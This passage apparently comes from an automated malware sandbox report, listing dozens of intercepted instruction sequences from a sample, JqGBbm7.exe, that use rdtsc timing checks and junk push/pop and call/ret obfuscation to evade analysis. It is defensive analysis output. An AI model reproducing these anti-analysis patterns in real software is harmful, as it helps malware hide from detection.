                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BDC1E2 second address: BDC203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC064DD4F84h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BDB424 second address: BDB428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BDC203 second address: BDC209 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BDB428 second address: BDB42C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BDC209 second address: BDC20E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BDD216 second address: BDD21B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BDC39A second address: BDC3A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BDE207 second address: BDE21C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC064DA37BDh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BDE537 second address: BDE53C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE25AF second address: BE25BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE06D6 second address: BE06E8 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC064DD4F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FC064DD4F76h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE25BE second address: BE25CC instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC064DA37B8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE06E8 second address: BE0768 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FC064DD4F78h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push dword ptr fs:[00000000h] 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 mov eax, dword ptr [ebp+122D1699h] 0x00000038 call 00007FC064DD4F82h 0x0000003d mov edi, dword ptr [ebp+122D3A5Dh] 0x00000043 pop edi 0x00000044 push FFFFFFFFh 0x00000046 mov edi, dword ptr [ebp+122D3A8Dh] 0x0000004c nop 0x0000004d jmp 00007FC064DD4F84h 0x00000052 push eax 0x00000053 pushad 0x00000054 push edi 0x00000055 pushad 0x00000056 popad 0x00000057 pop edi 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE0768 second address: BE076C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: B96A6D second address: B96A72 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: B96A72 second address: B96A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jnl 00007FC064DA37B6h 0x0000000c jnp 00007FC064DA37B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: B96A86 second address: B96A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE2AFB second address: BE2B13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE2B13 second address: BE2B2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FC064DD4F76h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 pushad 0x00000011 je 00007FC064DD4F76h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE3B8F second address: BE3B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE3B96 second address: BE3C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC064DD4F88h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e add dword ptr [ebp+122D23A8h], eax 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007FC064DD4F78h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 sub dword ptr [ebp+1244594Fh], esi 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebp 0x0000003b call 00007FC064DD4F78h 0x00000040 pop ebp 0x00000041 mov dword ptr [esp+04h], ebp 0x00000045 add dword ptr [esp+04h], 0000001Ah 0x0000004d inc ebp 0x0000004e push ebp 0x0000004f ret 0x00000050 pop ebp 0x00000051 ret 0x00000052 xor dword ptr [ebp+122D2E5Fh], edx 0x00000058 xchg eax, esi 0x00000059 push ebx 0x0000005a push eax 0x0000005b push edx 0x0000005c jne 00007FC064DD4F76h 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE4B26 second address: BE4B30 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC064DA37BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE6B54 second address: BE6B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE6B59 second address: BE6B70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC064DA37C3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE6B70 second address: BE6C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FC064DD4F78h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a mov ebx, dword ptr [ebp+122D3AD5h] 0x00000030 adc bh, FFFFFFD7h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007FC064DD4F78h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 0000001Dh 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f jg 00007FC064DD4F7Bh 0x00000055 jmp 00007FC064DD4F88h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d push ecx 0x0000005e push ebx 0x0000005f pop ebx 0x00000060 pop ecx 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE4CEE second address: BE4CF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE7A2C second address: BE7A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE7A31 second address: BE7A48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC064DA37C3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE6D83 second address: BE6D93 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC064DD4F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE6D93 second address: BE6DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DA37C7h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE6DAF second address: BE6DBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FC064DD4F76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE6DBA second address: BE6E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov bx, 2500h 0x0000000c push dword ptr fs:[00000000h] 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007FC064DA37B8h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d or ebx, 1C856A04h 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a sub dword ptr [ebp+122D2E5Bh], edx 0x00000040 mov dword ptr [ebp+122D372Eh], esi 0x00000046 mov eax, dword ptr [ebp+122D05B1h] 0x0000004c sub bx, AE9Dh 0x00000051 mov bh, B8h 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push ecx 0x00000058 call 00007FC064DA37B8h 0x0000005d pop ecx 0x0000005e mov dword ptr [esp+04h], ecx 0x00000062 add dword ptr [esp+04h], 00000018h 0x0000006a inc ecx 0x0000006b push ecx 0x0000006c ret 0x0000006d pop ecx 0x0000006e ret 0x0000006f or dword ptr [ebp+124531E5h], edx 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 jns 00007FC064DA37B6h 0x0000007f jnc 00007FC064DA37B6h 0x00000085 popad 0x00000086 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE7D3F second address: BE7D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE7D43 second address: BE7D47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE8E21 second address: BE8E3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC064DD4F82h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BE8F37 second address: BE8F3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BEB020 second address: BEB024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BEB024 second address: BEB028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: B919B0 second address: B919B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: B919B6 second address: B919C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BF3C48 second address: BF3C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BF3C4C second address: BF3C63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FC064DA37BCh 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BFAC92 second address: BFAC96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BFAD4B second address: BFAD58 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BFAD58 second address: BFAD7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jno 00007FC064DD4F84h 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BFAE1E second address: BFAE24 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BFAE24 second address: BFAE35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC064DD4F7Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BFAE35 second address: BFAE39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BFCCE6 second address: BFCD03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007FC064DD4F84h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C02EC2 second address: C02EF7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FC064DA37C9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FC064DA37C6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C02191 second address: C0219C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C023FE second address: C02402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C02402 second address: C02420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007FC064DD4F82h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C026F6 second address: C02710 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007FC064DA37B6h 0x0000000b pop esi 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C02710 second address: C02739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d jmp 00007FC064DD4F88h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C02739 second address: C0273D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C02CAB second address: C02D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DD4F7Bh 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ebx 0x00000010 jmp 00007FC064DD4F82h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 jbe 00007FC064DD4F76h 0x0000001f jmp 00007FC064DD4F7Fh 0x00000024 pop ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FC064DD4F80h 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C02D01 second address: C02D1D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC064DA37B6h 0x00000008 jmp 00007FC064DA37C2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: B8FEB0 second address: B8FED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jl 00007FC064DD4F78h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007FC064DD4F88h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: B8FED8 second address: B8FEDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C0C551 second address: C0C55D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FC064DD4F76h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C0C6E3 second address: C0C6EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C0CA1E second address: C0CA2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 js 00007FC064DD4F89h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C0D3E0 second address: C0D3E5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C11BE0 second address: C11BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C11BE6 second address: C11BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C11BEA second address: C11C14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F81h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC064DD4F7Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C11C14 second address: C11C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C11C18 second address: C11C22 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC064DD4F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C11E9F second address: C11EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C11EA5 second address: C11EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FC064DD4F82h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C11EBC second address: C11EE4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FC064DA37BEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jbe 00007FC064DA37B6h 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 jbe 00007FC064DA37B6h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C11EE4 second address: C11EEA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C12337 second address: C12384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 jmp 00007FC064DA37C1h 0x0000000c jmp 00007FC064DA37BAh 0x00000011 jo 00007FC064DA37B6h 0x00000017 popad 0x00000018 jns 00007FC064DA37CCh 0x0000001e popad 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push edi 0x00000023 pop edi 0x00000024 push edi 0x00000025 pop edi 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C12384 second address: C1238E instructions: 0x00000000 rdtsc 0x00000002 js 00007FC064DD4F76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C12966 second address: C1296E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C1296E second address: C12972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BB57E0 second address: BB5811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FC064DA37BCh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007FC064DA37C5h 0x00000012 popad 0x00000013 popad 0x00000014 push ecx 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: BB5811 second address: BB581B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: B8C9DC second address: B8C9E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C130AB second address: C130B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exe RDTSC instruction interceptor: First address: C130B1 second address: C130B7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
